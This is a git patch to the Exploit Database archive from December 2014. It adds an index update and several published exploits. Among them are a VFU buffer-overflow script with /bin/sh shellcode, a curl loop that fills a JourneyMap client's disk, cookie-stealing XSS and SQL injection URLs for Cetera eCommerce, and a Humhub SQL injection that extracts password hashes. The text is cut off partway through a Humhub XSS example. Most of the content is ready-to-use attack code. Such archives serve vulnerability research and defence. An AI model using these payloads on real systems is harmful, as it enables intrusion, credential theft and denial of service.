From 19bac3ab1e837d2e70ed6a5b8154afc620e9d764 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 11 Dec 2014 04:47:31 +0000 Subject: [PATCH] Updated 12_11_2014 --- files.csv | 12 +- platforms/linux/local/35450.txt | 29 ++++ platforms/multiple/remote/35339.txt | 38 ++++++ platforms/php/webapps/35508.txt | 26 ++++ platforms/php/webapps/35510.txt | 27 ++++ platforms/php/webapps/35511.txt | 45 +++++++ platforms/windows/dos/35507.pl | 198 ++++++++++++++++++++++++++++ platforms/windows/local/35449.rb | 120 +++++++++++++++++ platforms/windows/local/35503.rb | 131 ++++++++++++++++++ platforms/windows/local/35512.txt | 47 +++++++ platforms/windows/remote/35509.pl | 113 ++++++++++++++++ 11 files changed, 785 insertions(+), 1 deletion(-) create mode 100755 platforms/linux/local/35450.txt create mode 100755 platforms/multiple/remote/35339.txt create mode 100755 platforms/php/webapps/35508.txt create mode 100755 platforms/php/webapps/35510.txt create mode 100755 platforms/php/webapps/35511.txt create mode 100755 platforms/windows/dos/35507.pl create mode 100755 platforms/windows/local/35449.rb create mode 100755 platforms/windows/local/35503.rb create mode 100755 platforms/windows/local/35512.txt create mode 100755 platforms/windows/remote/35509.pl diff --git a/files.csv b/files.csv index 635df73b3..aa838193d 100755 --- a/files.csv +++ b/files.csv @@ -9834,7 +9834,7 @@ id,file,description,date,author,platform,type,port 10604,platforms/php/webapps/10604.pl,"Simple PHP Blog 0.5.1 - Local File Inclusion Vulnerability",2009-12-22,jgaliana,php,webapps,0 10606,platforms/php/webapps/10606.txt,"weenCompany SQL Injection Vulnerability",2009-12-22,Gamoscu,php,webapps,0 10609,platforms/php/webapps/10609.txt,"Aurora CMS Remote SQL Injection Exploit",2009-12-22,Sora,php,webapps,0 -10610,platforms/linux/remote/10610.rb,"CoreHTTP 0.5.3.1 (CGI) - Arbitrary Command Execution Vulnerability",2009-12-23,"Aaron Conole",linux,remote,0 +10610,platforms/linux/remote/10610.rb,"CoreHTTP 0.5.3.1 - (CGI) Arbitrary Command Execution Vulnerability",2009-12-23,"Aaron Conole",linux,remote,0 10611,platforms/php/webapps/10611.txt,"35mm Slide Gallery Cross Site Scripting Vulnerability",2009-12-23,indoushka,php,webapps,0 10612,platforms/php/webapps/10612.txt,"Add An Ad Script Remote File Upload",2009-12-23,MR.Z,php,webapps,0 10613,platforms/linux/local/10613.c,"2.6.18-20 2009 Local Root Exploit",2009-12-23,DigitALL,linux,local,0 @@ -31831,6 +31831,7 @@ id,file,description,date,author,platform,type,port 35336,platforms/php/webapps/35336.txt,"TaskFreak 0.6.4 index.php Multiple Parameter XSS",2011-02-12,LiquidWorm,php,webapps,0 35337,platforms/php/webapps/35337.txt,"TaskFreak 0.6.4 print_list.php Multiple Parameter XSS",2011-02-12,LiquidWorm,php,webapps,0 35338,platforms/php/webapps/35338.txt,"TaskFreak 0.6.4 rss.php HTTP Referer Header XSS",2011-02-12,LiquidWorm,php,webapps,0 +35339,platforms/multiple/remote/35339.txt,"JourneyMap 5.0.0RC2 Ultimate Edition - DoS (Resource Consumption)",2014-11-24,CovertCodes,multiple,remote,0 35340,platforms/php/webapps/35340.txt,"Wordpress wpDataTables Plugin 1.5.3 - SQL Injection Vulnerability",2014-11-24,"Claudio Viviani",php,webapps,0 35341,platforms/php/webapps/35341.py,"Wordpress wpDataTables Plugin 1.5.3 - Unauthenticated Shell Upload Vulnerability",2014-11-24,"Claudio Viviani",php,webapps,0 35342,platforms/aix/dos/35342.txt,"RobotStats 1.0 - HTML Injection Vulnerability",2014-11-24,"ZoRLu Bugrahan",aix,dos,0 @@ -31930,6 +31931,8 @@ id,file,description,date,author,platform,type,port 35445,platforms/linux/dos/35445.txt,"OpenLDAP 2.4.x 'modrdn' NULL OldDN Remote Denial of Service Vulnerability",2011-01-03,"Serge Dubrouski",linux,dos,0 35446,platforms/windows/remote/35446.pl,"Windows Movie Maker 2.1.4026 '.avi' File Remote Buffer Overflow Vulnerability",2011-03-10,KedAns-Dz,windows,remote,0 35447,platforms/php/webapps/35447.txt,"Google Document Embedder 2.5.16 - mysql_real_escpae_string bypass SQL Injection",2014-12-03,"Securely (Yoo Hee man)",php,webapps,0 +35449,platforms/windows/local/35449.rb,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit",2014-12-03,"Muhamad Fadzil Ramli",windows,local,0 +35450,platforms/linux/local/35450.txt,"VFU 4.10-1.1 - Buffer Overflow",2014-12-03,"Juan Sacco",linux,local,0 35451,platforms/php/webapps/35451.txt,"BoutikOne categorie.php path Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 35452,platforms/php/webapps/35452.txt,"BoutikOne list.php path Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 35453,platforms/php/webapps/35453.txt,"BoutikOne search.php Multiple Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 @@ -31973,3 +31976,10 @@ id,file,description,date,author,platform,type,port 35500,platforms/php/webapps/35500.txt,"Family Connections 2.3.2 'subject' Parameter HTML Injection Vulnerability",2011-03-25,"Zero Science Lab",php,webapps,0 35501,platforms/multiple/remote/35501.pl,"RealPlayer 11 '.rmp' File Remote Buffer Overflow Vulnerability",2011-03-27,KedAns-Dz,multiple,remote,0 35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 Denial of Service Vulnerability",2011-03-27,KedAns-Dz,windows,dos,0 +35503,platforms/windows/local/35503.rb,"Advantech AdamView 4.30.003 - (.gni) SEH Buffer Overflow",2014-12-09,"Muhamad Fadzil Ramli",windows,local,0 +35507,platforms/windows/dos/35507.pl,"DivX Player 7 Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0 +35508,platforms/php/webapps/35508.txt,"Cetera eCommerce Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-27,MustLive,php,webapps,0 +35509,platforms/windows/remote/35509.pl,"FLVPlayer4Free 2.9 '.fp4f' File Remote Buffer Overflow Vulnerability",2011-03-27,KedAns-Dz,windows,remote,0 +35510,platforms/php/webapps/35510.txt,"Humhub <= 0.10.0-rc.1 - SQL Injection Vulnerability",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0 +35511,platforms/php/webapps/35511.txt,"Humhub <= 0.10.0-rc.1 - Multiple Persistent XSS vulnerabilities",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0 +35512,platforms/windows/local/35512.txt,"Mobilis 3G mobiconnect 3G++ ZDServer 1.0.1.2 - (ZTE CORPORATION) Service Trusted Path Privilege Escalation",2014-12-10,s-dz,windows,local,0 diff --git a/platforms/linux/local/35450.txt b/platforms/linux/local/35450.txt new file mode 100755 index 000000000..d1bc28efe --- /dev/null +++ b/platforms/linux/local/35450.txt @@ -0,0 +1,29 @@ +# Exploit Author: Juan Sacco - http://www.exploitpack.com + +# Tested on: GNU/Linux - Debian Wheezy +# Description: VFU v4.10-1.1 is prone to a stack-based buffer overflow +# vulnerability because the application fails to perform adequate +# boundary-checks on user-supplied input. +# +# An attacker can exploit this issue to execute arbitrary code in the +# context of the application. Failed exploit attempts will result in a +# denial-of-service condition. +# +# Vendor homepage: VFU v4.10-1.1 ( Latest version ) - +http://cade.datamax.bg/vfu/ +# Debian package: https://packages.debian.org/wheezy/vfu + +buffersize = 803 +nopsled = "\x90" +shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" +eip = "\x10\xf0\xff\xbf" +buffer = nopsled * (buffersize-len(shellcode)) + eip + +try: + subprocess.call(["vfu -d", buffer]) +except OSError as e: + if e.errno == os.errno.ENOENT: + print "VFU not found!" + else: + print "Error executing exploit" + raise diff --git a/platforms/multiple/remote/35339.txt b/platforms/multiple/remote/35339.txt new file mode 100755 index 000000000..280a7a310 --- /dev/null +++ b/platforms/multiple/remote/35339.txt @@ -0,0 +1,38 @@ +# Exploit Title: JourneyMap Disk-space consumption exploit +# Date: 23Nov2014 +# Exploit Author: CovertCodes +# Vendor Homepage: http://journeymap.techbrew.net/ +# Software Link: http://journeymap.techbrew.net/download/ +# Version: 5.0.0RC2 Ultimate Edition +# Tested on: Linux + + + JourneyMap (http://journeymap.techbrew.net/) is a mapping mod for +Minecraft. It comes included with some modpacks, and is enabled by +default in the popular Feed the Beast client. JourneyMap opens a web +server on the client which is configured to listen on port 8080. When +the client is running, a remote, unauthenticated user can have +JourneyMap save a screenshot of the game to the hard drive by accessing +a specific URL, consuming hard drive space. Here's an example: + +#!/bin/bash + while true; + do + curl -o /dev/null 192.168.1.1:8080/action?type=savemap&mapType=day + done + + This works even when the client has paused the game (by pressing +escape.) We include mapType=day because the software should refuse to +save a screenshot if the client user is underground, and the game is set +on hardcore mode. + + Accessing the URL and triggering a screenshot will display a message +on the client's screen, which may somewhat lessen the severity of this +exploit. Further, it takes a long time to fill up disk using this +technique. JourneyMap allows depth and resolution to be specified in +the URL as well, though a few simple tests showed no change despite +altering these parameters. If one were able to increase the depth and +resolution of the image, the drive would fill up faster. + + Tested with JourneyMap 5.0.0RC2 Ultimate Edition, but presumed to +work on other versions as well. diff --git a/platforms/php/webapps/35508.txt b/platforms/php/webapps/35508.txt new file mode 100755 index 000000000..36014e766 --- /dev/null +++ b/platforms/php/webapps/35508.txt @@ -0,0 +1,26 @@ +source: http://www.securityfocus.com/bid/47044/info + +Cetera eCommerce is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Cetera eCommerce versions 15.0 and prior are vulnerable. + +Cross Site Scripting: + +http://www.example.com/catalog/%3Cscript%3Ealert(document.cookie)%3C/script%3E/ +http://www.example.com/vendors/%3Cscript%3Ealert(document.cookie)%3C/script%3E/ +http://www.example.com/catalog/cart/%3Cscript%3Ealert(document.cookie)%3C/script%3E/ +http://www.example.com/news/%3Cscript%3Ealert(document.cookie)%3C/script%3E/ +http://www.example.com/news/13012011111030/%3Cscript%3Ealert(document.cookie)%3C/script%3E/ +http://www.example.com/%3Cscript%3Ealert(document.cookie)%3C/script%3E/ + +This vulnerability have appeared in version 15.0. Vulnerability takes place +at page with error 404, so it'll work as at this URL, as at other URLs, +which lead to non-existent pages. + +SQL Injection: + +http://www.example.com/catalog/(version()=5.1)/ +http://www.example.com/catalog/cart/.+benchmark(100000,md5(now()))+./ + diff --git a/platforms/php/webapps/35510.txt b/platforms/php/webapps/35510.txt new file mode 100755 index 000000000..baac0970e --- /dev/null +++ b/platforms/php/webapps/35510.txt @@ -0,0 +1,27 @@ +# Exploit Title: Humhub <= 0.10.0-rc.1 SQL injection vulnerability +# Date: 08-12-2014 +# Exploit Author: Jos Wetzels, Emiel Florijn +# Vendor Homepage: https://www.humhub.org +# Software Link: https://github.com/humhub/humhub/releases +# Version: <= 0.10.0-rc.1 + +The Humhub [1] social networking kit versions 0.10.0-rc.1 and prior suffer from an SQL injection vulnerability, which has now been resolved in cooperation with the vendor [2], in its notification listing functionality allowing an attacker to obtain backend database access. In the actionIndex() function located in "/protected/modules_core/notification/controllers/ListController.php" [3] a check is performed on the unsanitized $lastEntryId variable (which is fetched from the 'from' GET parameter) to see if it is greater than 0. However, since PHP uses type-unstrict comparisons and $lastEntryId isn't guaranteed to be an integer, this allows an attacker to prefix their string of choice with any number of integers (so that $lastEntryId gets treated as an integer during the comparison) such that the comparison evaluates to true and $criteria->condition is injected with the otherwise unsanitized $lastEntryId, which can be any SQL injection. + +Proof of Concept: Performing the following request + + index.php?r=notification/list/index&from=999) AND (CASE WHEN 0x30<(SELECT substring(password,1,1) FROM user_password WHERE id = 1) THEN 1 ELSE 0 END) AND (1=1 + +Allows an attacker to perform a binary search SQL injection. In addition, the SQL error handling of the function in question allows the attacker to perform a reflected Cross-Site Scripting attack. + +Proof of Concept: Directing any user to the following link + + index.php/?r=notification/list/index&from=999) AND ("